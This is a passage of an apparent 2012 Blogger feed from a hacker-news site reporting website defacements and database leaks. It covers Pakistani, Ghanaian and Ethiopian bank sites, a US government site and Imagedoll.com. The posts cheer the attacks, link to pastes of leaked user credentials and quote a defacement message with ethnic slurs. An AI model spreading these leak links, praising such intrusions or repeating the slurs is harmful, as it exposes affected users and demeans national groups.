style=&quot;color: red;&quot; /&gt;&lt;span style=&quot;color: red; font-family: Arial,Helvetica,sans-serif;&quot;&gt;http://pakcollection.com/&amp;nbsp;&lt;/span&gt;&lt;/b&gt; &lt;b&gt;&lt;br style=&quot;color: red;&quot; /&gt;&lt;span style=&quot;color: red; font-family: Arial,Helvetica,sans-serif;&quot;&gt;http://alawan.com.pk/&amp;nbsp;&lt;/span&gt;&lt;/b&gt; &lt;b&gt;&lt;br style=&quot;color: red;&quot; /&gt;&lt;span style=&quot;color: red; font-family: Arial,Helvetica,sans-serif;&quot;&gt;http://www.artpk.org/&amp;nbsp;&lt;/span&gt;&lt;/b&gt; &lt;b&gt;&lt;br style=&quot;color: red;&quot; /&gt;&lt;span style=&quot;color: red; font-family: Arial,Helvetica,sans-serif;&quot;&gt;http://www.lbc.org.pk/&amp;nbsp;&lt;/span&gt;&lt;/b&gt; &lt;b&gt;&lt;br style=&quot;color: red;&quot; /&gt;&lt;/b&gt; &lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;http://www.songspklive.com/ &lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://code104.blogspot.com/feeds/9105575693278284677/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://code104.blogspot.com/2012/01/20-pakistani-websites-hacked-by-jaguar.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default/9105575693278284677'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default/9105575693278284677'/><link rel='alternate' type='text/html' href='http://code104.blogspot.com/2012/01/20-pakistani-websites-hacked-by-jaguar.html' title='20 Pakistani Websites Hacked by Jaguar'/><author><name>Code104 Reporter</name><uri>http://www.blogger.com/profile/05710600492322397735</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV3vhieqH7IEmzUET9t94agr92vCv6xMfHaDv_yUeWbcpAKVjLczDoJ_kKvMCA53KCdrEZByZsz2-U950RsWwu4R1_TWG8LSNTQ_JTMc2GmZf8vpKfEvdxP56Iw6iSLQ/s220/sacm.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBvjyU-XpfbK7lIQmIfL_pKa1TZxG3-JWCduOmKnugTPSux06YYuU-3IqqadifkiBrlvH152W9LP2triBstCeszmQtzjn1ydAHJ2MzGHtXY7ufl34p9VdxSj3vbirx9vpC19y_T-Vf44cY/s72-c/jaguar.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2826169767096655436.post-5423941690880662356</id><published>2012-01-26T00:34:00.001-08:00</published><updated>2012-01-26T00:34:41.773-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Cyber News"/><category scheme="http://www.blogger.com/atom/ns#" term="Defacements"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacker News"/><category scheme="http://www.blogger.com/atom/ns#" term="Hackers"/><category scheme="http://www.blogger.com/atom/ns#" term="Indian Hackers"/><category scheme="http://www.blogger.com/atom/ns#" term="News"/><title type='text'>24 Pakistani Websites hacked by Team Nuts [Indian hackers]</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Team Nuts Back Again, 24 pakistani websites Hacked by Team NUTS on Indian Republic Day&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt; &lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;img alt=&quot;1tab91.jpg (400×210)&quot; src=&quot;http://i42.tinypic.com/1tab91.jpg&quot; /&gt; &lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;u&gt;&lt;b&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Thier Message on deface Page :&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot; style=&quot;color: red;&quot;&gt; &lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;This Hack is A  tribute to The Hero&#39;s of 26/11 Who Laid their precious life for the  country people HeY ! PoRkIeZ 26/11 - SoMe pAkIsTaNI Dogs,PiGs AttAcKed  TaJ Hotel Now we are back with your D grade Sites.... Revenge is Revenge  ..... We were quiet not defacing site soMe motherfucking LAME pakistani  ooops Porkistani made us to do this mishap Why dont you Guys Understnd  y0ur Countries FutuRe is in trouble aNd Bc0z of some Idiot Pakistanis  whole Pakistan is being given Bad words.....&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;JAI HIND&lt;/span&gt;&lt;/blockquote&gt;&lt;div style=&quot;color: red;&quot;&gt; &lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://code104.blogspot.com/feeds/5423941690880662356/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://code104.blogspot.com/2012/01/24-pakistani-websites-hacked-by-team.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default/5423941690880662356'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default/5423941690880662356'/><link rel='alternate' type='text/html' href='http://code104.blogspot.com/2012/01/24-pakistani-websites-hacked-by-team.html' title='24 Pakistani Websites hacked by Team Nuts [Indian hackers]'/><author><name>Code104 Reporter</name><uri>http://www.blogger.com/profile/05710600492322397735</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV3vhieqH7IEmzUET9t94agr92vCv6xMfHaDv_yUeWbcpAKVjLczDoJ_kKvMCA53KCdrEZByZsz2-U950RsWwu4R1_TWG8LSNTQ_JTMc2GmZf8vpKfEvdxP56Iw6iSLQ/s220/sacm.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://i42.tinypic.com/1tab91_th.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2826169767096655436.post-2305590867051238140</id><published>2012-01-26T00:33:00.000-08:00</published><updated>2012-01-26T00:33:21.571-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Cyber News"/><category scheme="http://www.blogger.com/atom/ns#" term="Database Exposed"/><category scheme="http://www.blogger.com/atom/ns#" term="Defacements"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacker News"/><category scheme="http://www.blogger.com/atom/ns#" term="News"/><category scheme="http://www.blogger.com/atom/ns#" term="Security News"/><title type='text'>Ghana Bank Websites hacked and Database leaked by SEPO</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7A-96TdPZGWfW4xSowk3qaMWoife8w94am9AZtgYBSKxDA0x0jlBTxExwO8vZQX2_fsf90kf1bX15gkvfOX2wuhjXnsF-BaR2dU4skO672-Pe4xSSqWS1yyVt6LRs6EACfuVBx5OLnCVm/s1600/sepo.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7A-96TdPZGWfW4xSowk3qaMWoife8w94am9AZtgYBSKxDA0x0jlBTxExwO8vZQX2_fsf90kf1bX15gkvfOX2wuhjXnsF-BaR2dU4skO672-Pe4xSSqWS1yyVt6LRs6EACfuVBx5OLnCVm/s1600/sepo.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Hacker anon_4freedom continue their cyber attack on Ghana ,recently they break into the Commercial Bank of Ethiopia website and leaked the database. He focused on Ghana&#39;s bank website , for the last four days he hacked around five bank websites. Also he hacked FidelityBank Ghana, UT Bank and dumped the database in his own blog.&lt;br /&gt;
&lt;br /&gt;
&quot;It is very important, becouse other admins read all of this and they understand that everything in the internet can be hacked&quot; Hacker said&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;&lt;b&gt;The following bank sites are hacked:&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
http://www.utbankghana.com/&lt;br /&gt;
http://www.combanketh.com/&lt;br /&gt;
http://www.fidelitybank.com.gh/&lt;br /&gt;
&lt;br /&gt;
The &lt;a href=&quot;http://virtualsepo.blogspot.com/2012/01/commercial-bank-of-ethiopia-website.html&quot; target=&quot;_blank&quot;&gt;dumped&lt;/a&gt; database belong to Commercial Bank of Ethiopia contains the username, encrypted password ,email id and user role.&lt;br /&gt;
&lt;br /&gt;
The &lt;a href=&quot;http://virtualsepo.blogspot.com/2012/01/fidelitybank-ghana-hacked-data-leaked.html&quot; target=&quot;_blank&quot;&gt;dumped&lt;/a&gt; database belong to UT Bank contains the the admin userid, encrypted password and email id .&lt;br /&gt;
&lt;br /&gt;
The &lt;a href=&quot;http://virtualsepo.blogspot.com/2012/01/ut-bank-ghana-hacked-by-sepo.html&quot; target=&quot;_blank&quot;&gt;dumped&lt;/a&gt; database belong to UT Bank contains the user countr, phone number and other details.&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot; style=&quot;color: red;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; The Commercial Bank of Ethiopia (CBE) is the largest commercial bank in Ethiopia and had about Birr 73.7 billion (US$4.45 billion), in assets at the end of June 2010. At the time, the bank held approximately 63.5% of deposits and about 38% of all bank loans in the country. The bank has about 9, 000 employees who staff the headquarters and 301 branches positioned in the main cities and regional towns, including 45 branches in Addis Ababa. CBE recently opened new branches in the remote towns of Injibara and Humera. &lt;/blockquote&gt;&lt;div style=&quot;color: red;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; UT Bank Ghana Limited, commonly known as UT Bank (UTB), is a commercial bank inGhana. As of February 2011, the bank is one of twenty-seven (27) licensed commercial banks in Ghana.&lt;/span&gt;&lt;br style=&quot;color: red;&quot; /&gt;&lt;span style=&quot;color: red;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; UTB is a medium-sized financial services provider headquartered in Ghana with subsidiaries inwest Africa and Western Europe. The bank&#39;s total assets in December 2009 were valued at nearly US$140 million, with shareholders&#39; equity of approximately US$15 million.&lt;/span&gt;&lt;/blockquote&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://code104.blogspot.com/feeds/2305590867051238140/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://code104.blogspot.com/2012/01/ghana-bank-websites-hacked-and-database.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default/2305590867051238140'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default/2305590867051238140'/><link rel='alternate' type='text/html' href='http://code104.blogspot.com/2012/01/ghana-bank-websites-hacked-and-database.html' title='Ghana Bank Websites hacked and Database leaked by SEPO'/><author><name>Code104 Reporter</name><uri>http://www.blogger.com/profile/05710600492322397735</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV3vhieqH7IEmzUET9t94agr92vCv6xMfHaDv_yUeWbcpAKVjLczDoJ_kKvMCA53KCdrEZByZsz2-U950RsWwu4R1_TWG8LSNTQ_JTMc2GmZf8vpKfEvdxP56Iw6iSLQ/s220/sacm.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7A-96TdPZGWfW4xSowk3qaMWoife8w94am9AZtgYBSKxDA0x0jlBTxExwO8vZQX2_fsf90kf1bX15gkvfOX2wuhjXnsF-BaR2dU4skO672-Pe4xSSqWS1yyVt6LRs6EACfuVBx5OLnCVm/s72-c/sepo.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2826169767096655436.post-5547240544331341172</id><published>2012-01-25T21:24:00.000-08:00</published><updated>2012-01-25T21:24:48.791-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="News"/><title type='text'>Happy Republic Day</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSxz5t0-5bRGnz8xEVtTPhFZivmnvTPsznyyCzDfzLjMLbcQEZ0T0cXqtUXPbOPLQOIaY1rpm6kSEMRpdMIspPHnVqwVFPlyxO3rpaQ161qpsfQC8N5EH4LIvPMQToSMNeybOCGp3YrnUj/s1600/hrd.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;188&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSxz5t0-5bRGnz8xEVtTPhFZivmnvTPsznyyCzDfzLjMLbcQEZ0T0cXqtUXPbOPLQOIaY1rpm6kSEMRpdMIspPHnVqwVFPlyxO3rpaQ161qpsfQC8N5EH4LIvPMQToSMNeybOCGp3YrnUj/s400/hrd.jpg&quot; width=&quot;400&quot; /&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&amp;nbsp; &lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;background-color: black; font-size: x-large;&quot;&gt;&lt;span style=&quot;color: orange;&quot;&gt;HAPPY&lt;/span&gt; &lt;span style=&quot;color: #f3f3f3;&quot;&gt;REP&lt;/span&gt;&lt;span style=&quot;color: blue;&quot;&gt;UB&lt;/span&gt;&lt;span style=&quot;color: #f3f3f3;&quot;&gt;LIC&lt;/span&gt; &lt;span style=&quot;color: #274e13;&quot;&gt;DAY &lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://code104.blogspot.com/&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;&lt;b&gt;Code 104&lt;/b&gt;&lt;/u&gt;&lt;/a&gt; Wishes you a very very Happy Republic Day to all the Indians and Indian haxors ! Enjoy this day with your friends and family. &lt;br /&gt;
&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;The 26th of January was chosen to honour the memory of the declaration of independence of 1930.&lt;/blockquote&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;b&gt;&lt;u&gt;History :-&amp;nbsp;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;
Although India obtained its independence on 15 August 1947, it did not yet have a permanent constitution.&lt;br /&gt;
While India&#39;s Independence Day celebrates its freedom from British Rule, the Republic Day celebrates the coming into force of its constitution..... &lt;a href=&quot;http://en.wikipedia.org/wiki/Republic_Day_%28India%29&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;&lt;b&gt;[READ MORE]&lt;/b&gt;&lt;/u&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;We know everyone knows the history !&amp;nbsp;&lt;/div&gt;&lt;div style=&quot;font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace; text-align: center;&quot;&gt;&lt;u&gt;&lt;b&gt;Be ready for best news from Indishell and other Indian Groups !&lt;/b&gt;&lt;/u&gt;&lt;/div&gt;&lt;br /&gt;
&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://code104.blogspot.com/feeds/5547240544331341172/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://code104.blogspot.com/2012/01/happy-republic-day.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default/5547240544331341172'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default/5547240544331341172'/><link rel='alternate' type='text/html' href='http://code104.blogspot.com/2012/01/happy-republic-day.html' title='Happy Republic Day'/><author><name>Code104 Reporter</name><uri>http://www.blogger.com/profile/05710600492322397735</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV3vhieqH7IEmzUET9t94agr92vCv6xMfHaDv_yUeWbcpAKVjLczDoJ_kKvMCA53KCdrEZByZsz2-U950RsWwu4R1_TWG8LSNTQ_JTMc2GmZf8vpKfEvdxP56Iw6iSLQ/s220/sacm.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSxz5t0-5bRGnz8xEVtTPhFZivmnvTPsznyyCzDfzLjMLbcQEZ0T0cXqtUXPbOPLQOIaY1rpm6kSEMRpdMIspPHnVqwVFPlyxO3rpaQ161qpsfQC8N5EH4LIvPMQToSMNeybOCGp3YrnUj/s72-c/hrd.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2826169767096655436.post-6720652045999847614</id><published>2012-01-25T04:15:00.000-08:00</published><updated>2012-01-25T04:15:23.743-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Antisec"/><category scheme="http://www.blogger.com/atom/ns#" term="Cyber News"/><category scheme="http://www.blogger.com/atom/ns#" term="Defacements"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacker News"/><category scheme="http://www.blogger.com/atom/ns#" term="Hackers"/><category scheme="http://www.blogger.com/atom/ns#" term="News"/><category scheme="http://www.blogger.com/atom/ns#" term="Security News"/><title type='text'>#OPMegaupload - OnGuardOnline.gov Hacked by Antisec</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnJfQB6czci49E2ZJTK0QjHDwu9PxAbgI-j7v9CzH-iDM6DYnbVbX32NXUPLUpP7ckfGlLlhwwMZupdSCL2fX-cXOuVZyf3zNhh8aKPZf2QWeS9KuyutW2yqGY18T6DwrONWw7C6CVNGqZ/s1600/AntiSec_top.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;213&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnJfQB6czci49E2ZJTK0QjHDwu9PxAbgI-j7v9CzH-iDM6DYnbVbX32NXUPLUpP7ckfGlLlhwwMZupdSCL2fX-cXOuVZyf3zNhh8aKPZf2QWeS9KuyutW2yqGY18T6DwrONWw7C6CVNGqZ/s320/AntiSec_top.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Hackers under auspices of the &lt;a href=&quot;http://en.wikipedia.org/wiki/Operation_AntiSec&quot; target=&quot;_blank&quot;&gt;AntiSec&lt;/a&gt;  group claimed responsibility for hacking OnGuardOnline.gov, the U.S.  federal government&#39;s online security website, in protest of various  internet-related legislation including ACTA, SOPA and PIPA.  OnGuardOnline.gov is managed by the U.S. Federal Trade Commission (FTC)  in cooperation with 14 other agencies.&lt;br /&gt;
In a message left on the OnGuardOnline website and on Pastebin,  hackers threatened to continue &quot;a relentless war against the corporate  internet&quot;, and promised to destroy &quot;dozens upon dozens&quot; of government  and corporate websites, if the aforementioned legislation are made into  law.&lt;br /&gt;
Much like Anonymous’s actions against Polish government websites  hacked over the weekend, the group promised to release sensitive data  including emails, passwords, bank accounts, and other information from  hacked websites.&lt;br /&gt;
&quot;We are sitting on hundreds of rooted servers getting ready to drop  all your mysql dumps and mail spools,&quot; the Anonymous-affiliated hacker  group said.&lt;br /&gt;
The FTC did not comment on the attack.&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;background-color: white; border: medium none; color: black; overflow: hidden; text-align: left; text-decoration: none;&quot;&gt;&lt;u&gt;&lt;b&gt;Website :-&lt;/b&gt;&lt;/u&gt; &lt;a href=&quot;http://onguardonline.gov/&quot;&gt;http://onguardonline.gov/&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://code104.blogspot.com/feeds/6720652045999847614/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://code104.blogspot.com/2012/01/opmegaupload-onguardonlinegov-hacked-by.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default/6720652045999847614'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default/6720652045999847614'/><link rel='alternate' type='text/html' href='http://code104.blogspot.com/2012/01/opmegaupload-onguardonlinegov-hacked-by.html' title='#OPMegaupload - OnGuardOnline.gov Hacked by Antisec'/><author><name>Code104 Reporter</name><uri>http://www.blogger.com/profile/05710600492322397735</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV3vhieqH7IEmzUET9t94agr92vCv6xMfHaDv_yUeWbcpAKVjLczDoJ_kKvMCA53KCdrEZByZsz2-U950RsWwu4R1_TWG8LSNTQ_JTMc2GmZf8vpKfEvdxP56Iw6iSLQ/s220/sacm.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnJfQB6czci49E2ZJTK0QjHDwu9PxAbgI-j7v9CzH-iDM6DYnbVbX32NXUPLUpP7ckfGlLlhwwMZupdSCL2fX-cXOuVZyf3zNhh8aKPZf2QWeS9KuyutW2yqGY18T6DwrONWw7C6CVNGqZ/s72-c/AntiSec_top.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2826169767096655436.post-8730188243833212724</id><published>2012-01-24T08:45:00.000-08:00</published><updated>2012-01-24T08:46:07.938-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Cyber News"/><category scheme="http://www.blogger.com/atom/ns#" term="Database Exposed"/><category scheme="http://www.blogger.com/atom/ns#" term="Defacements"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacker News"/><category scheme="http://www.blogger.com/atom/ns#" term="Hackers"/><category scheme="http://www.blogger.com/atom/ns#" term="Indian Hackers"/><category scheme="http://www.blogger.com/atom/ns#" term="League of Assasins"/><category scheme="http://www.blogger.com/atom/ns#" term="News"/><category scheme="http://www.blogger.com/atom/ns#" term="Security News"/><title type='text'>Imagedoll.com Hacked &amp; 1300 + User info leaked by aKfortyseven</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCvFmb6VouN5N64NeC5Ce9gWPGICOO5cbj7fi0IaCwgTng3kuMR7YJKkyOup28YA3e0f8n6uPUXdyk5qd1ZM-BRO_PZO98qkg5nvk9T96UiDE9OyivUV3anndq93y0OWRPu7XCGgTvRQrK/s1600/imagedoll.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;172&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCvFmb6VouN5N64NeC5Ce9gWPGICOO5cbj7fi0IaCwgTng3kuMR7YJKkyOup28YA3e0f8n6uPUXdyk5qd1ZM-BRO_PZO98qkg5nvk9T96UiDE9OyivUV3anndq93y0OWRPu7XCGgTvRQrK/s320/imagedoll.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
After Many days Indian hacker named akfortyseven from &lt;a href=&quot;http://code104.blogspot.com/&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;&lt;b&gt;League of Assassins [Code104]&lt;/b&gt;&lt;/u&gt;&lt;/a&gt; pawned a website and leaked more than 1300 user data of website ! This effected the users also ! , passwords that are leaked from Imagedoll.com might be similar to the passwords of their other accounts on Facebook, G-mail etc. !We can say that From 1300 users almost 40% of them have the same passwords !&lt;br /&gt;
&lt;br /&gt;
Hacker says that he leaked the passwords using &lt;u&gt;&lt;b&gt;SQLi Vulnerability&lt;/b&gt;&lt;/u&gt; he found&amp;nbsp; in that website.&amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Imagedoll is a Image hosting website used by many users to upload images, and its having a &lt;u&gt;&lt;b&gt;Alexa World Wide Rank is 610,758&lt;/b&gt;&lt;/u&gt; &amp;amp; &lt;u&gt;&lt;b&gt;Google Pagerank -2 &lt;/b&gt;&lt;/u&gt;. It is a High profile website. &lt;br /&gt;
&lt;br /&gt;
He leaked user details in a pastehtml release !&lt;br /&gt;
Here it is :- &lt;a href=&quot;http://pastehtml.com/view/bltmj993d.html&quot; target=&quot;_blank&quot;&gt;http://pastehtml.com/view/bltmj993d.html&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://code104.blogspot.com/feeds/8730188243833212724/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://code104.blogspot.com/2012/01/imagedollcom-hacked-1300-user-info.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default/8730188243833212724'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2826169767096655436/posts/default/8730188243833212724'/><link rel='alternate' type='text/html' href='http://code104.blogspot.com/2012/01/imagedollcom-hacked-1300-user-info.html' title='Imagedoll.com Hacked &amp; 1300 + User info leaked by aKfortyseven'/><author><name>Code104 Reporter</name><uri>http://www.blogger.com/profile/05710600492322397735</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV3vhieqH7IEmzUET9t94agr92vCv6xMfHaDv_yUeWbcpAKVjLczDoJ_kKvMCA53KCdrEZByZsz2-U950RsWwu4R1_TWG8LSNTQ_JTMc2GmZf8vpKfEvdxP56Iw6iSLQ/s220/sacm.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCvFmb6VouN5N64NeC5Ce9gWPGICOO5cbj7fi0IaCwgTng3kuMR7YJKkyOup28YA3e0f8n6uPUXdyk5qd1ZM-BRO_PZO98qkg5nvk9T96UiDE9OyivUV3anndq93y0OWRPu7XCGgTvRQrK/s72-c/imagedoll.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2826169767096655436.post-2878808021747061768</id><published>2012-01-24T05:50:00.000-08:00</published><updated>2012-01-24T05:51:03.587-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Cyber News"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacker News"/><category scheme="http://www.blogger.com/atom/ns#" term="Hackers"/><category scheme="http://www.blogger.com/atom/ns#" term="News"/><category scheme="http://www.blogger.com/atom/ns#" term="Team Grey Hat"/><title type='text'>Team Grey Hat Exposed - The IIS Exploit 